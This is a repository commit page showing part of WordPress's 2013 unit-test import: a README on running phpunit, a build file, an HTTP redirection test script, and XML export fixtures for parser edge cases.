sergiotarxz/Wordpress
1
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity

Initial import of unit-tests repository into develop.svn.wordpress.org.

Browse Source 
Imported from https://unit-tests.svn.wordpress.org/trunk@1337

see #24976.



git-svn-id: https://develop.svn.wordpress.org/trunk@25002 602fd350-edb4-49c9-b593-d223f7449a82
This commit is contained in:
Andrew Nacin 2013-08-07 06:38:38 +00:00
parent b43712e0f7
commit 1801ed459c
315 changed files with 40437 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23
tests/README.txt Normal file
View File

@ -0,0 +1,23 @@
The short version:
1. Create a clean MySQL database and user. DO NOT USE AN EXISTING DATABASE or you will lose data, guaranteed.
2. Copy wp-tests-config-sample.php to wp-tests-config.php, edit it and include your database name/user/password.
3. $ svn up
4. Run the tests from the "trunk" directory:
To execute a particular test:
$ phpunit tests/test_case.php
To execute all tests:
$ phpunit
Notes:
Test cases live in the 'tests' subdirectory. All files in that directory will be included by default. Extend the WP_UnitTestCase class to ensure your test is run.
phpunit will initialize and install a (more or less) complete running copy of WordPress each time it is run. This makes it possible to run functional interface and module tests against a fully working database and codebase, as opposed to pure unit tests with mock objects and stubs. Pure unit tests may be used also, of course.
Changes to the test database will be rolled back as tests are finished, to ensure a clean start next time the tests are run.
phpunit is intended to run at the command line, not via a web server.

15
tests/build.xml Normal file
View File

@ -0,0 +1,15 @@
<?xml version="1.0" encoding="utf-8"?>
<project name="WordPress Unit Tests" default="build" basedir=".">
<target name="clean">
<delete dir="build" />
</target>
<target name="prepare">
<mkdir dir="build/logs" />
<mkdir dir="build/phpunitreport" />
</target>
<target name="phpunit">
<exec command="phpunit" passthru="true"></exec>
<phpunitreport infile="build/logs/junit.xml" format="frames" todir="build/phpunitreport" usesorttable="true" />
</target>
<target name="build" depends="clean,prepare,phpunit" />
</project>

2057
tests/build/logs/junit.xml Normal file
View File

File diff suppressed because it is too large Load Diff

3795
tests/data/.trac-ticket-cache.core.trac.wordpress.org Normal file
View File

File diff suppressed because it is too large Load Diff

29
tests/data/.trac-ticket-cache.unit-tests.trac.wordpress.org Normal file
View File

@ -0,0 +1,29 @@
¿id
12
19
22
30
32
35
39
42
99
104
105
106
110
114
116
119
120
121
124
131
132
135
136
138
139
140
141
142

112
tests/data/WPHTTP-testcase-redirection-script.php Normal file
View File

@ -0,0 +1,112 @@
<?php
// Thanks WordPress..
function is_ssl() {
if ( isset($_SERVER['HTTPS']) ) {
if ( 'on' == strtolower($_SERVER['HTTPS']) )
return true;
if ( '1' == $_SERVER['HTTPS'] )
return true;
} elseif ( isset($_SERVER['SERVER_PORT']) && ( '443' == $_SERVER['SERVER_PORT'] ) ) {
return true;
}
return false;
}
$url = ( is_ssl() ? 'https://' : 'http://' ) . $_SERVER['HTTP_HOST'] . (!empty($_SERVER['HTTP_POST']) && 80 != $_SERVER['HTTP_POST'] ? ':' . $_SERVER['HTTP_POST'] : '');
if ( strpos($_SERVER['REQUEST_URI'], '?') )
$url .= substr($_SERVER['REQUEST_URI'], 0, strpos($_SERVER['REQUEST_URI'], '?'));
else
$url .= $_SERVER['REQUEST_URI'];
if ( isset($_GET['source']) ) {
highlight_file(__FILE__ );
exit;
}
if ( isset($_GET['201-location']) ) {
header("HTTP/1.1 201 OK");
if ( isset($_GET['fail']) ) {
echo "FAIL";
} else {
header("Location: $url?201-location&fail=true", true, 201);
echo "PASS";
}
exit;
}
if ( isset($_GET['header-check']) ) {
$out = array();
header("Content-type: text/plain");
foreach ( $_SERVER as $key => $value ) {
if ( stripos($key, 'http') === 0 ) {
$key = strtolower(substr($key, 5));
echo "$key:$value\n";
}
}
exit;
}
if ( isset($_GET['multiple-headers']) ) {
header("HeaderName: One", false);
header("HeaderName: Two", false);
header("HeaderName: Three", false);
exit;
}
if ( isset( $_GET['post-redirect-to-method'] ) ) {
$method = $_SERVER['REQUEST_METHOD'];
$response_code = isset( $_GET['response_code'] ) ? $_GET['response_code'] : 301;
if ( 'POST' == $method && ! isset( $_GET['redirection-performed'] ) ) {
header( "Location: $url?post-redirect-to-method=1&redirection-performed=1", true, $response_code );
exit;
}
echo $method;
exit;
}
if ( isset( $_GET['location-with-200'] ) ) {
if ( ! isset( $_GET['redirection-performed'] ) ) {
header( "HTTP/1.1 200 OK" );
header( "Location: $url?location-with-200=1&redirection-performed", true, 200 );
echo 'PASS';
exit;
}
// Redirection was followed
echo 'FAIL';
exit;
}
if ( isset( $_GET['print-pass'] ) ) {
echo 'PASS';
exit;
}
if ( isset( $_GET['multiple-location-headers'] ) ) {
if ( ! isset( $_GET['redirected'] ) ) {
header( "Location: $url?multiple-location-headers=1&redirected=one", false );
header( "Location: $url?multiple-location-headers=1&redirected=two", false );
exit;
}
if ( 'two' != $_GET['redirected'] )
echo 'FAIL';
else
echo 'PASS';
exit;
}
$rt = isset($_GET['rt']) ? $_GET['rt'] : 5;
$r = isset($_GET['r']) ? $_GET['r'] : 0;
if ( $r < $rt ) {
$code = isset($_GET['code']) ? (int)$_GET['code'] : 302;
header("Location: $url?rt=" . $rt . "&r=" . ($r+1), true, $code);
echo "Redirect $r of $rt";
exit;
}
echo "Redirect $r of $rt is FINAL.<br/>";
echo "GET['rt'] = Total times to redirect. Defaults to 5.<br />";
echo "GET['r'] = Current redirection. Defaults to 0.<br />";
echo "<a href='$url?source=true'>View Source</a>";

46
tests/data/export/crazy-cdata-escaped.xml Normal file
View File

@ -0,0 +1,46 @@
<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0"
xmlns:excerpt="http://wordpress.org/export/1.1/excerpt/"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:wp="http://wordpress.org/export/1.1/"
>
<channel>
<wp:wxr_version>1.1</wp:wxr_version>
<wp:base_site_url>http://wp.dev</wp:base_site_url>
<item>
<title>Hello world!</title>
<link>http://example.org/?p=1</link>
<pubDate>Thu, 05 Jan 2012 14:30:46 +0000</pubDate>
<dc:creator>admin</dc:creator>
<guid isPermaLink="false">http://example.org/?p=1</guid>
<content:encoded><![CDATA[Content with nested <![CDATA[ tags ]]]]><![CDATA[> :)]]></content:encoded>
<excerpt:encoded><![CDATA[]]></excerpt:encoded>
<wp:post_id>1</wp:post_id>
<wp:post_date>2012-01-05 14:30:46</wp:post_date>
<wp:post_date_gmt>2012-01-05 14:30:46</wp:post_date_gmt>
<wp:comment_status>open</wp:comment_status>
<wp:ping_status>open</wp:ping_status>
<wp:post_name>hello-world</wp:post_name>
<wp:status>publish</wp:status>
<wp:post_parent>0</wp:post_parent>
<wp:menu_order>0</wp:menu_order>
<wp:post_type>post</wp:post_type>
<wp:post_password></wp:post_password>
<wp:is_sticky>0</wp:is_sticky>
<wp:postmeta>
<wp:meta_key>Plain string</wp:meta_key>
<wp:meta_value><![CDATA[Foo]]></wp:meta_value>
</wp:postmeta>
<wp:postmeta>
<wp:meta_key>Closing CDATA</wp:meta_key>
<wp:meta_value><![CDATA[]]]]><![CDATA[>]]></wp:meta_value>
</wp:postmeta>
<wp:postmeta>
<wp:meta_key>Alot of CDATA</wp:meta_key>
<wp:meta_value><![CDATA[This has <![CDATA[ opening and ]]]]><![CDATA[> closing <![CDATA[ tags like this: ]]]]><![CDATA[>]]></wp:meta_value>
</wp:postmeta>
</item>
</channel>
</rss>

46
tests/data/export/crazy-cdata.xml Normal file
View File

@ -0,0 +1,46 @@
<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0"
xmlns:excerpt="http://wordpress.org/export/1.1/excerpt/"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:wp="http://wordpress.org/export/1.1/"
>
<channel>
<wp:wxr_version>1.1</wp:wxr_version>
<wp:base_site_url>http://wp.dev</wp:base_site_url>
<item>
<title>Hello world!</title>
<link>http://example.org/?p=1</link>
<pubDate>Thu, 05 Jan 2012 14:30:46 +0000</pubDate>
<dc:creator>admin</dc:creator>
<guid isPermaLink="false">http://example.org/?p=1</guid>
<content:encoded><![CDATA[Content with nested <![CDATA[ tags ]]> :)]]></content:encoded>
<excerpt:encoded><![CDATA[]]></excerpt:encoded>
<wp:post_id>1</wp:post_id>
<wp:post_date>2012-01-05 14:30:46</wp:post_date>
<wp:post_date_gmt>2012-01-05 14:30:46</wp:post_date_gmt>
<wp:comment_status>open</wp:comment_status>
<wp:ping_status>open</wp:ping_status>
<wp:post_name>hello-world</wp:post_name>
<wp:status>publish</wp:status>
<wp:post_parent>0</wp:post_parent>
<wp:menu_order>0</wp:menu_order>
<wp:post_type>post</wp:post_type>
<wp:post_password></wp:post_password>
<wp:is_sticky>0</wp:is_sticky>
<wp:postmeta>
<wp:meta_key>Plain string</wp:meta_key>
<wp:meta_value><![CDATA[Foo]]></wp:meta_value>
</wp:postmeta>
<wp:postmeta>
<wp:meta_key>Closing CDATA</wp:meta_key>
<wp:meta_value><![CDATA[]]>]]></wp:meta_value>
</wp:postmeta>
<wp:postmeta>
<wp:meta_key>Alot of CDATA</wp:meta_key>
<wp:meta_value><![CDATA[This has <![CDATA[ opening and ]]> closing <![CDATA[ tags like this: ]]>]]></wp:meta_value>
</wp:postmeta>
</item>
</channel>
</rss>

91
tests/data/export/invalid-version-tag.xml Normal file
View File

@ -0,0 +1,91 @@
<?xml version="1.0" encoding="UTF-8" ?>
<!-- This is a WordPress eXtended RSS file generated by WordPress as an export of your site. -->
<!-- It contains information about your site's posts, pages, comments, categories, and other content. -->
<!-- You may use this file to transfer that content from one site to another. -->
<!-- NB: This file is not intended to serve as a complete backup of your blog. -->
<!-- To import this information into a WordPress site follow these steps: -->
<!-- 1. Log in to that site as an administrator. -->
<!-- 2. Go to Tools: Import in the WordPress admin panel. -->
<!-- 3. Install the "WordPress" importer from the list. -->
<!-- 4. Activate & Run Importer. -->
<!-- 5. Upload this file using the form provided on that page. -->
<!-- 6. You will first be asked to map the authors in this export file to users -->
<!-- on the site. For each author, you may choose to map to an -->
<!-- existing user on the site or to create a new user. -->
<!-- 7. WordPress will then import each of the posts, pages comments, categories, etc. -->
<!-- contained in this file into your blog. -->
<!-- generator="WordPress/3.1-alpha" created="2010-10-09 15:12" -->
<rss version="2.0"
xmlns:excerpt="http://wordpress.org/export/1.1/excerpt/"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:wp="http://wordpress.org/export/1.1/"
>
<channel>
<title>WXR Test Data</title>
<link>http://localhost/</link>
<description>Blog with sample content for testing</description>
<pubDate>Sat, 09 Oct 2010 15:12:29 +0000</pubDate>
<language>en</language>
<wp:wxr_version>abc</wp:wxr_version>
<wp:base_site_url>http://localhost/</wp:base_site_url>
<wp:base_blog_url>http://localhost/</wp:base_blog_url>
<wp:author><wp:author_login>john</wp:author_login><wp:author_email>johndoe@example.org</wp:author_email><wp:author_display_name><![CDATA[John Doe]]></wp:author_display_name><wp:author_first_name><![CDATA[John]]></wp:author_first_name><wp:author_last_name><![CDATA[Doe]]></wp:author_last_name></wp:author>
<wp:category><wp:term_id>1</wp:term_id><wp:category_nicename>alpha</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[alpha]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>2</wp:term_id><wp:category_nicename>bar</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[Bar]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>3</wp:term_id><wp:category_nicename>beta</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[beta]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>4</wp:term_id><wp:category_nicename>delta</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[delta]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>5</wp:term_id><wp:category_nicename>epsilon</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[epsilon]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>6</wp:term_id><wp:category_nicename>eta</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[eta]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>7</wp:term_id><wp:category_nicename>foo</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[Foo]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>8</wp:term_id><wp:category_nicename>foo-bar</wp:category_nicename><wp:category_parent>bar</wp:category_parent><wp:cat_name><![CDATA[Foo]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>9</wp:term_id><wp:category_nicename>gamma</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[gamma]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>10</wp:term_id><wp:category_nicename>iota</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[iota]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>11</wp:term_id><wp:category_nicename>kappa</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[kappa]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>12</wp:term_id><wp:category_nicename>lambda</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[lambda]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>13</wp:term_id><wp:category_nicename>level-1</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[Level 1]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>14</wp:term_id><wp:category_nicename>level-2</wp:category_nicename><wp:category_parent>level-1</wp:category_parent><wp:cat_name><![CDATA[Level 2]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>15</wp:term_id><wp:category_nicename>level-3</wp:category_nicename><wp:category_parent>level-2</wp:category_parent><wp:cat_name><![CDATA[Level 3]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>16</wp:term_id><wp:category_nicename>parent</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[pArEnT]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>17</wp:term_id><wp:category_nicename>theta</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[theta]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>18</wp:term_id><wp:category_nicename>uncategorized</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[Uncategorized]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>19</wp:term_id><wp:category_nicename>zeta</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[zeta]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>20</wp:term_id><wp:category_nicename>also-level-3</wp:category_nicename><wp:category_parent>level-2</wp:category_parent><wp:cat_name><![CDATA[Also Level 3]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>21</wp:term_id><wp:category_nicename>child</wp:category_nicename><wp:category_parent>parent</wp:category_parent><wp:cat_name><![CDATA[CHILD]]></wp:cat_name></wp:category>
<wp:tag><wp:term_id>22</wp:term_id><wp:tag_slug>clippable</wp:tag_slug><wp:tag_name><![CDATA[Clippable]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>23</wp:term_id><wp:tag_slug>deuterogamy</wp:tag_slug><wp:tag_name><![CDATA[Deuterogamy]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>24</wp:term_id><wp:tag_slug>entablement</wp:tag_slug><wp:tag_name><![CDATA[Entablement]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>25</wp:term_id><wp:tag_slug>intermembral</wp:tag_slug><wp:tag_name><![CDATA[Intermembral]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>26</wp:term_id><wp:tag_slug>masticatory</wp:tag_slug><wp:tag_name><![CDATA[Masticatory]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>27</wp:term_id><wp:tag_slug>obligato</wp:tag_slug><wp:tag_name><![CDATA[Obligato]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>28</wp:term_id><wp:tag_slug>occultation</wp:tag_slug><wp:tag_name><![CDATA[Occultation]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>29</wp:term_id><wp:tag_slug>onion</wp:tag_slug><wp:tag_name><![CDATA[Onion]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>30</wp:term_id><wp:tag_slug>pontonier</wp:tag_slug><wp:tag_name><![CDATA[Pontonier]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>31</wp:term_id><wp:tag_slug>rooftree</wp:tag_slug><wp:tag_name><![CDATA[Rooftree]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>32</wp:term_id><wp:tag_slug>saccule</wp:tag_slug><wp:tag_name><![CDATA[Saccule]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>33</wp:term_id><wp:tag_slug>salpa</wp:tag_slug><wp:tag_name><![CDATA[Salpa]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>34</wp:term_id><wp:tag_slug>tag-1</wp:tag_slug><wp:tag_name><![CDATA[tag 1]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>35</wp:term_id><wp:tag_slug>tag-2</wp:tag_slug><wp:tag_name><![CDATA[tag 2]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>36</wp:term_id><wp:tag_slug>tag-3</wp:tag_slug><wp:tag_name><![CDATA[tag 3]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>37</wp:term_id><wp:tag_slug>tag-4</wp:tag_slug><wp:tag_name><![CDATA[tag 4]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>38</wp:term_id><wp:tag_slug>tag-5</wp:tag_slug><wp:tag_name><![CDATA[tag 5]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>39</wp:term_id><wp:tag_slug>tentage</wp:tag_slug><wp:tag_name><![CDATA[Tentage]]></wp:tag_name></wp:tag>
<wp:term><wp:term_id>40</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>bieup</wp:term_slug><wp:term_parent></wp:term_parent><wp:term_name><![CDATA[bieup]]></wp:term_name></wp:term>
<wp:term><wp:term_id>41</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>blah</wp:term_slug><wp:term_parent></wp:term_parent><wp:term_name><![CDATA[blah]]></wp:term_name></wp:term>
<wp:term><wp:term_id>42</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>digeut</wp:term_slug><wp:term_parent></wp:term_parent><wp:term_name><![CDATA[digeut]]></wp:term_name></wp:term>
<wp:term><wp:term_id>43</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>giyeok</wp:term_slug><wp:term_parent></wp:term_parent><wp:term_name><![CDATA[giyeok]]></wp:term_name></wp:term>
<wp:term><wp:term_id>44</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>halb</wp:term_slug><wp:term_parent></wp:term_parent><wp:term_name><![CDATA[halb]]></wp:term_name></wp:term>
<wp:term><wp:term_id>45</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>mieum</wp:term_slug><wp:term_parent></wp:term_parent><wp:term_name><![CDATA[mieum]]></wp:term_name></wp:term>
<wp:term><wp:term_id>46</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>nieun</wp:term_slug><wp:term_parent></wp:term_parent><wp:term_name><![CDATA[nieun]]></wp:term_name></wp:term>
<wp:term><wp:term_id>47</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>parent-2</wp:term_slug><wp:term_parent></wp:term_parent><wp:term_name><![CDATA[Parent]]></wp:term_name></wp:term>
<wp:term><wp:term_id>48</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>rieul</wp:term_slug><wp:term_parent></wp:term_parent><wp:term_name><![CDATA[rieul]]></wp:term_name></wp:term>
<wp:term><wp:term_id>49</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>siot</wp:term_slug><wp:term_parent></wp:term_parent><wp:term_name><![CDATA[siot]]></wp:term_name></wp:term>
<wp:term><wp:term_id>50</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>tax-1</wp:term_slug><wp:term_parent></wp:term_parent><wp:term_name><![CDATA[TAX 1]]></wp:term_name></wp:term>
<wp:term><wp:term_id>51</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>tax-2</wp:term_slug><wp:term_parent></wp:term_parent><wp:term_name><![CDATA[TAX 2]]></wp:term_name></wp:term>
<wp:term><wp:term_id>52</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>blah-halb</wp:term_slug><wp:term_parent>halb</wp:term_parent><wp:term_name><![CDATA[blah]]></wp:term_name></wp:term>
<wp:term><wp:term_id>53</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>child-parent-2</wp:term_slug><wp:term_parent>parent-2</wp:term_parent><wp:term_name><![CDATA[chilD]]></wp:term_name></wp:term>
</channel>
</rss>

91
tests/data/export/malformed.xml Normal file
View File

@ -0,0 +1,91 @@
<?xml version="1.0" encoding="UTF-8" ?>
<!-- This is a WordPress eXtended RSS file generated by WordPress as an export of your site. -->
<!-- It contains information about your site's posts, pages, comments, categories, and other content. -->
<!-- You may use this file to transfer that content from one site to another. -->
<!-- NB: This file is not intended to serve as a complete backup of your blog. -->
<!-- To import this information into a WordPress site follow these steps: -->
<!-- 1. Log in to that site as an administrator. -->
<!-- 2. Go to Tools: Import in the WordPress admin panel. -->
<!-- 3. Install the "WordPress" importer from the list. -->
<!-- 4. Activate & Run Importer. -->
<!-- 5. Upload this file using the form provided on that page. -->
<!-- 6. You will first be asked to map the authors in this export file to users -->
<!-- on the site. For each author, you may choose to map to an -->
<!-- existing user on the site or to create a new user. -->
<!-- 7. WordPress will then import each of the posts, pages comments, categories, etc. -->
<!-- contained in this file into your blog. -->
<!-- generator="WordPress/3.1-alpha" created="2010-10-09 15:12" -->
<rss version="2.0"
xmlns:excerpt="http://wordpress.org/export/1.1/excerpt/"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:wp="http://wordpress.org/export/1.1/"
>
<notachanneltag>
<title>WXR Test Data</title>
<link>http://localhost/</link>
<description>Blog with sample content for testing</description>
<pubDate>Sat, 09 Oct 2010 15:12:29 +0000</pubDate>
<language>en</language>
<wp:wxr_version>abc</wp:wxr_version>
<wp:base_site_url>http://localhost/</wp:base_site_url>
<wp:base_blog_url>http://localhost/</wp:base_blog_url>
<wp:author><wp:author_login>john</wp:author_login><wp:author_email>johndoe@example.org</wp:author_email><wp:author_display_name><![CDATA[John Doe]]></wp:author_display_name><wp:author_first_name><![CDATA[John]]></wp:author_first_name><wp:author_last_name><![CDATA[Doe]]></wp:author_last_name></wp:author>
<wp:category><wp:term_id>1</wp:term_id><wp:category_nicename>alpha</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[alpha]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>2</wp:term_id><wp:category_nicename>bar</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[Bar]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>3</wp:term_id><wp:category_nicename>beta</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[beta]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>4</wp:term_id><wp:category_nicename>delta</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[delta]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>5</wp:term_id><wp:category_nicename>epsilon</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[epsilon]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>6</wp:term_id><wp:category_nicename>eta</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[eta]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>7</wp:term_id><wp:category_nicename>foo</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[Foo]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>8</wp:term_id><wp:category_nicename>foo-bar</wp:category_nicename><wp:category_parent>bar</wp:category_parent><wp:cat_name><![CDATA[Foo]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>9</wp:term_id><wp:category_nicename>gamma</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[gamma]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>10</wp:term_id><wp:category_nicename>iota</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[iota]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>11</wp:term_id><wp:category_nicename>kappa</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[kappa]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>12</wp:term_id><wp:category_nicename>lambda</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[lambda]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>13</wp:term_id><wp:category_nicename>level-1</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[Level 1]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>14</wp:term_id><wp:category_nicename>level-2</wp:category_nicename><wp:category_parent>level-1</wp:category_parent><wp:cat_name><![CDATA[Level 2]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>15</wp:term_id><wp:category_nicename>level-3</wp:category_nicename><wp:category_parent>level-2</wp:category_parent><wp:cat_name><![CDATA[Level 3]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>16</wp:term_id><wp:category_nicename>parent</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[pArEnT]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>17</wp:term_id><wp:category_nicename>theta</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[theta]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>18</wp:term_id><wp:category_nicename>uncategorized</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[Uncategorized]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>19</wp:term_id><wp:category_nicename>zeta</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[zeta]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>20</wp:term_id><wp:category_nicename>also-level-3</wp:category_nicename><wp:category_parent>level-2</wp:category_parent><wp:cat_name><![CDATA[Also Level 3]]></wp:cat_name></wp:category>
<wp:category><wp:term_id>21</wp:term_id><wp:category_nicename>child</wp:category_nicename><wp:category_parent>parent</wp:category_parent><wp:cat_name><![CDATA[CHILD]]></wp:cat_name></wp:category>
<wp:tag><wp:term_id>22</wp:term_id><wp:tag_slug>clippable</wp:tag_slug><wp:tag_name><![CDATA[Clippable]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>23</wp:term_id><wp:tag_slug>deuterogamy</wp:tag_slug><wp:tag_name><![CDATA[Deuterogamy]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>24</wp:term_id><wp:tag_slug>entablement</wp:tag_slug><wp:tag_name><![CDATA[Entablement]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>25</wp:term_id><wp:tag_slug>intermembral</wp:tag_slug><wp:tag_name><![CDATA[Intermembral]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>26</wp:term_id><wp:tag_slug>masticatory</wp:tag_slug><wp:tag_name><![CDATA[Masticatory]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>27</wp:term_id><wp:tag_slug>obligato</wp:tag_slug><wp:tag_name><![CDATA[Obligato]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>28</wp:term_id><wp:tag_slug>occultation</wp:tag_slug><wp:tag_name><![CDATA[Occultation]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>29</wp:term_id><wp:tag_slug>onion</wp:tag_slug><wp:tag_name><![CDATA[Onion]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>30</wp:term_id><wp:tag_slug>pontonier</wp:tag_slug><wp:tag_name><![CDATA[Pontonier]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>31</wp:term_id><wp:tag_slug>rooftree</wp:tag_slug><wp:tag_name><![CDATA[Rooftree]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>32</wp:term_id><wp:tag_slug>saccule</wp:tag_slug><wp:tag_name><![CDATA[Saccule]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>33</wp:term_id><wp:tag_slug>salpa</wp:tag_slug><wp:tag_name><![CDATA[Salpa]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>34</wp:term_id><wp:tag_slug>tag-1</wp:tag_slug><wp:tag_name><![CDATA[tag 1]]></wp:tag_name></wp:tag>
<wp:tag><wp:term_id>35</wp:term_id><wp:tag_slug>tag-2</wp:tag_slug><wp:tag_name><![CDATA[tag 2]]></wp:tag_name></wp:tag>
